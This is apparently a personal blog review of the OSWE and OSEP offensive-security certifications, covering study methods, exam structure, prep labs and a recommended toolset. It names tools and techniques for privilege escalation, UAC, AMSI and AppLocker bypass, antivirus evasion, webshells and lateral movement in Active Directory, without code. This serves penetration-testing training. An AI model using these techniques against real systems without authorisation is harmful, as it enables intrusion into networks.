[Backup] OSEP and OSWE Review
Hello folks, recently I took OSWE exam. For more information about the course, you can check the official website https://www.offensive-security.com/awae-oswe/. Considering that I also passed OSEP (https://www.offensive-security.com/pen300-osep/) half a year ago, I would like to share my thoughts and feelings. It should be noted that because I passed OSEP half a year ago, I cannot be 100% sure that my personal experience is still fully applicable, such as whether the course content has been added and modified. Next, let’s talk one by one. Before reading the following, please make sure you have an understanding of the course content of OSWE and OSEP, for example, you are a student who is preparing for the exam, or going to enroll. Therefore, the information that can be found on the official website will not be repeated here.
OSWE
For me, I am not confident in Web application assessment and penetration testing because I have no experience in software development. For Web penetration testing, having development experience is undoubtedly an advantage when it comes to understanding application architecture, secure code reviewing, etc. In regard to courses I passed previously, such as OSCP, it did not explain some common web vulnerabilities in depth, most of the time we just need to use exploits of CVE vulnerabilities to attack web application. As a penetration tester and red team operator, although I am better at network and infrastructure penetration testing, web application exploitation is always unavoidable, and web exploitation is often a key to get a foodhold of a company internal. Therefore, I made up my mind to enroll OSWE to strengthen my web assessment skill, and it is also directly helpful to my current job. OSWE is a 300 series course, the depth and difficulty of which are above the web attack part in OSCP. This is a course that focuses on white-box code review and includes a small amount of black-box penetration testing, but reviewing and analyzing code are always expected. But if you ask me whether it is helpful for black box penetration testing, my answer is yes, especially for me who does not have a good web security foundation. I didn’t even understand some common concepts well such as CORS, CSRF, deserialization, SSTI, etc. Although OSWE is a 300 series course, it still starts from the basics, these concepts are explained in detail. After understanding the basics and theory, even in a black-box penetration testing, you can naturally infer the possible user input sanitization, code snippets, etc. that may exist in the backend.
Before I enrolled OSWE I was worried that my skill was insufficient to learn OSWE, and I would feel struggled when going through materials. And actually I did have some difficulties with few chapters, such as prototype pollution, .NET deserialization, etc. But after going through the materials many times, following the steps, and completing exercises and extra-miles, my skills were improved greatly. OSWE currently involves PHP, JAVA, .NET, NodeJS, and Python web applications, so it is necessary to be able to understand the codes of these languages. In addition, there is also a great demand for Javascript and Python scripting skills, and sometimes it is even necessary to use Java, .NET, and C to create PoC. In addition to these languages, familiarity with SQL syntax and usage of BurpSuite are also very important. If you are like me, not very confident about your web security skills but want to enroll OSWE, I still recommend getting familiar with these in advance. Although OSWE teaches many things from the basics, the jump to complex scenario is quick, because Offsec assumes that you have already been familiar with certain knowledge, such as the use of requests library in python, SQL syntax, etc. By the way, if you are still not sure whether you reach the minimal requirement to go for OSWE, and your budget is not an issue, eLearnSecurity’s eWPT (https://elearnsecurity.com/product/ewpt-certification/) can help you supplement most of required knowledge, because as I said, although OSWE will also talk about basic concepts, the jump is relatively quick. Although I did not take the eWPT exam, I spent a few weeks going through the eWPT course materials, and my mind got clear a lot.
Compared with OSEP and OSED in OSCE3, OSWE has been active for longer time, so the course content has also been extended and updated, such as chapters of CSRF, SSRF, prototype pollution and other vulnerabilities added in the last content extension. Also, the Atmail from XSS to RCE chapter is archived, but student can still access it, so I strongly recommend learning and practicing like other chapters. In regard to learning methodology, you must follow the course materials while practicing and coding, it is useless to just read them like articles. Combining video and pdf, concept and hands-on, and completing exercises and extra-miles as much as possible. After learning each chapter, try to create a script that can automate all steps. During the learning process, you also need to read a lot of articles and official documents. For example, the official documentation of the Express framework, analysis articles on a specific vulnerability.
OSWE has a total of 3 labs which do not have official walkthrough, you are supposed to apply the knowledge you have learned to successfully compromise them. 2 of them are white box machines, and 1 is black box machine. Before the exam, make sure you complete at least 2 white-box labs with different attack paths. Whether you need additional practice before the exam is a matter of opinion. But if you’re up for it, here are some personally collected recommended resources.
1: HTB OSWE like target drone https://www.todosec.com/infosec/infosec-topics/boxes/htb/htb-oswe-tjnull
2: https://github.com/rootshooter/oswe-prep-2022
3: https://pentesterlab.com/
4: https://portswigger.net/web-security/all-labs
5: Find some open source web application to review source code
But if you ask me, I think deeply understanding 2 white box labs is enough, but the above exercises can undoubtedly increase your proficiency, by this way you can find vulnerabilities and exploit them faster. Next, I will talk about the part about the exam. I will not reveal the details of the exam machine, but will share some personal experience and tips.
Many people, including me, have been complaining that Offsec’s course materials are insufficient for preparing for the exam, a lot of extra exercises are required, such as OSCP. But in regard to OSWE, I don’t think so, but this does not mean that reproducing what you have learned in course materials is enough to pass. You still have to think out of box, read articles, take some extra exercises appropriately, and try harder. For example, if the course materials explain XML deserialization attack in .NET applications, then you would like to understand binary deserialization attack in .NET application, or deserialization attack in Java application, and so on. Maybe you will feel that the scope is much larger at once, but as long as you track user input closely, do some research and searching, you will be fine. In OSWE exam, there are 2 applications, and each application has authentication bypass phase and RCE phase, a total of 4 flags, and you can pass with 3 flags, which means that you can leave RCE phase of an application incompleted. Please read the official exam guide (https://help.offensive-security.com/hc/en-us/articles/360046869951-OSWE-Exam-Guide) before the exam. Remember not to download the source code to your local machine during the exam, you are allowed to review source code, debug, and test on debug machines, while debug machines are almost identical to exam machines but with different credentials, etc. After completing the exp script, run it against the exam machine to capture the flag. Some people worry that whether there will be a problem if they cannot find the vulnerability in source code immediately during OSWE exam. Next, I share one of my biggest feelings about OSWE exam. I set 4 phases for completing each exam application.
Phase 1: Discovery of Vulnerabilities in Source Code
Phase 2: Construct an exploitation chain in theory
Phase 3: Able to compromise the target with user interaction, such as using burpsuite to modify the request to get RCE
Phase 4: Write a script to automate all the steps and get RCE
There is a big gap between each 2 phase! Therefore, do not be super relaxed after finding the vulnerability immediately, because you are far away from the end. For me, I think getting 3 flags in the exam is not very difficult, but it still took me a long time to achieve, because before reaching phase 4, I always encountered various unexpected problems, such as syntax errors, unstable network connection, RCE but not shell, etc. For unstable network connection, this is beyond our control, so I suggest to run it on one debug machine after completing the exp script. Attacking through Openvpn on your Kali, you may encounter weird issues caused by unstable network connection. The exp scripts submitted for the exam are very strict and need to be fully automated without any user interaction, so you must be very careful, including starting Apache Server, printing flags, etc.
If you ask me whether OSWE is helpful for real-world Web whilte-box assessment, it must be very helpful. For example, it will definitely be much easier for you to review some open source Web applications on Github and get your own CVE. Well, let’s finish OSWE part and talk about OSEP.
OSEP
I passed the OSEP exam in my second attempt half a year ago. Although it was a long time ago, I still have some impressions. OSEP is also a 300 series course, which is the successor of OSCP, so it has a higher level of difficulty and depth. For details, please check the official website (https://www.offensive-security.com/pen300-osep/). OSEP is positioned as an advanced level penetration testing course, but it also contains a lot of content in red teaming realm, such as phishing, C2, antivirus evasion, etc. However, OSEP does not mainly focus on OPSEC like CRTO. In OSEP, Active Directory exploitation is a main part, and most of the labs and the exam are in the Active Directory infrastructure, so if you have a good understanding of Active Directory exploitation before learning OSEP, it will be a great advantage. OSCP also covers AD exploitation, but the contents are superficial. To be familiar with AD concept and exploitation, CRTO from ZeroPoint Security (https://training.zeropointsecurity.co.uk/courses/red-team-ops) and CRTP from Pentester Academy (https://www.pentesteracademy.com/activedirectorylab) are good choices. Besides, HTB and Tryhackme also have AD modules, which can help you quickly get used to penetration testing in AD environment.
The skills taught in OSEP can be especially helpful in these areas: External and InternalNetwork Penetration Testing, Infrastructure Penetration Testing, Red Team Ops. Although you may need to exploit web application, considering that OSEP is not focused on web penetration testing, web exploitation will not be very difficult. It is worth noting that because OSEP is the successor of OSCP, OSEP assumes that you have mastered the knowledge in OSCP, such as multiple ways to get a reverse shell, enumeration and exploitation of SMB services, etc. The PDF course material of OSEP has 700+ pages, which is second only to OSCP’s PDF. Different from OSCP, OSEP focuses more on internal theory and programming to create your own tradecrafts, such as C# implementation of PrintSpoofer and PsExec. Therefore, although OSEP is not a code review course similar to OSWE, students still need to review and write code frequently. Before enrolling OSEP, it would be better if you have some understanding of Win32 API, reverse engineering, C#, and C/C++. It doesn’t matter if you don’t, because the code style is different from tradecraft and production software. In addition to AD exploitation, another important part in OSEP is evasion and breaching defenses. Apart from AV evasion, you are also expected to bypass various security control like AppLocker, AMSI, CLM, Network Segmentation, Restrictive Environments, etc. Therefore, while attacking targets and expanding our foothold, we must also avoid detection and bypass security controls. Fortunately, at least in the context of OSEP, these security controls are fragile as long as you know how to handle them.
OSEP course includes 6 labs. Of course, the lab of each chapter is also the playground for us. 4 labs are AD environment, and their size are different. I recommend completing them with multiple attack paths and different C2(s). You also wanna complete all exercises and extra-miles. So, when you complete all labs and exercises, how to prepare for the exam?
As I said previously, OSWE is one of the exceptions in Offsec courses that course materials are sufficient for exam. Unfortunately, I don’t think it applies for OSEP. To pass OSEP exam, you are expected to have decent theory and knowledge, read lots of articles, and do certain research, and some extra exercises. Or we can say, OSEP course materials are sufficient for exam, but Offsec assumes that you have mastered a lot of skills. If you want to be more ready when taking the exam, the following are personally recommended exam preparation resources:
1: PentesterAcademy’s CRTE course (https://www.pentesteracademy.com/redteamlab)
2: ZeroPoint Security’s CRTO course
3: HackTheBox Pro Lab Cybernetics (https://www.hackthebox.com/newsroom/prolab-cybernetics)
Because CRTE and CRTO are guided courses and labs, Pro Lab Cybernetics is far more close to OSEP exam, and it is much more difficult than OSEP. So if you complete Cybernetics, OSEP exams won’t be a problem for you. Next, I will talk about my thoughts and tips related to the exam. I will not disclose details of exam machines either.
The exam environment of OSEP is a network infrastructure of a fictitious enterprise with multiple domains. Capture the secret flag on a specific host or collect 10 flags to pass (https://help.offensive-security.com/hc/en-us/articles/360050293792-OSEP-Exam-Guide), some people say that both methods to pass require similar efforts, so do not expect a shortcut to pass. Although I didn’t capture the secret flag, I feel that it is the case. In OSEP exam, students have more freedom in the choice of tools, except for commercial tools, others, including sqlmap and restricted Metasploit in OSCP. Therefore, please be sure to prepare your toolset before the OSEP exam. The OSEP exam is the most dependent on your personal toolset among all Offsec courses. In OSEP course PDF, to make students understand system internal better, many tools are created by students themselves, such as C# implementation of MSSQL client. But in the exam, please be sure to pick more handy tools. The following is an incomplete list of the tools I recommend
1: Ghostpack toolset (https://github.com/GhostPack). Including Rubeus, Seatbelt and other C# tools. Very handy!
2: PowerUpSQL (https://github.com/NetSPI/PowerUpSQL), enumerate and exploit MSSQL database
3: Impacket tool set (https://github.com/SecureAuthCorp/impacket), such as psexec, mssqlclient, etc. are very powerful and decent tools. Very handy!
4: evil-winrm, remote access Win-RM service, Kali includes it by default.
5: clm-bypass (https://github.com/calebstewart/bypass-clm), bypasses CLM and spawn an interactive powershell session
6: PrintSpoofer (https://github.com/itm4n/PrintSpoofer), abuses SeImpersonatePrivilege while spoolsv is running
7: SweetPotato (https://github.com/CCob/SweetPotato), provides a variety of methods to abuse SeImpersonatePrivilege, even when spoolsv is stopped.
8: SharpyShell (https://github.com/antonioCoco/SharPyShell), a semi-interactive .NET Webshell that can bypass antivirus
9: KeyTabExtract (https://github.com/sosdave/KeyTabExtract), extract credentials from keytab file
10: xfreerdp, remote access RDP, supports pass-the-hash
11: Bloodhound-python (https://github.com/fox-it/BloodHound.py), Python version of bloodhound, can collect domain object data on Kali
12: PsExec, a tool signed by Microsoft
13: Apart from Metasploit, try some other C2 like Sliver C2 (https://github.com/BishopFox/sliver)
14: CME (https://github.com/Porchetta-Industries/CrackMapExec), now it has become a toolset like impacket, and can be used for password spray and permission check. Very Handy!
15: UACME (https://github.com/hfiref0x/UACME), still usable UAC bypass
16: RunasCs (https://github.com/antonioCoco/RunasCs), provide credentials and execute commands as the impersonated user.
…………
As you all know, at the end of last year, a student leaked OSEP exam sets and the walkthrough, which forced Offsec to replace all leaked OSEP exam sets with new ones, and the difficulty increased a lot according to many students’ feedbacks. It is unfortunate news, we can’t change it, but we can become stronger and nail the exam. In addition to the tools recommended above, I also give several tactical suggestions
1: After getting the initial foothold, don’t rush to continue to exploit or move laterally. Enumerate all the things you can enumerate. For example, domain user? domain machine? Their IPs? Readable/Writable SMB shares? MSSQL instances? Security controls in place?
2: Always assume all security controls are in place on your target hosts, such as AV, AppLocker, UAC, etc. Therefore, please take these security control bypasses into consideration when delivering payloads.
3: Please don’t forget what you have learned in OSCP, such as PHP insecure file upload, FTP anonymous access, CVE vulnerability exploitation, etc.
4: OSEP focuses on AD exploitation and security control bypass, but not only these two! Web application exploitation, network service attack, common misconfiguration, etc. are also important.
5: Abandon some mindsets in CTF or OSCP, for example, local privilege escalation must be done before moving to next target.
6: Some other reference resources
https://github.com/chvancooten/OSEP-Code-Snippets
https://www.ired.team/
https://book.hacktricks.xyz/welcome/readme
Is OSEP helpful for penetration test and red team ops in real-world? I think it helps a lot, there are many technologies that can be applied on the most up to date OS, such as CLM bypass, AMSI bypass, MSSQL exploitation, etc. However, few topics in OSEP are not updated enough, such as domain fronting, antivirus evasion. Take AV evasion as the example, evasion methods mentioned in OSEP are still superficial. Even if you apply all evasion methods taught in OSEP on your tradecraft, it will be flagged immediately by most of AV products. Since OSEP came out in 2020, it is understandable. Anyway, OSEP provides a good learning and research direction and mindset, it is not difficult to evade today’s AV products as long as you do some exploration and research.
Alright, let’s wrap up today’s review, hope every body enjoys the courses and will nail your exam!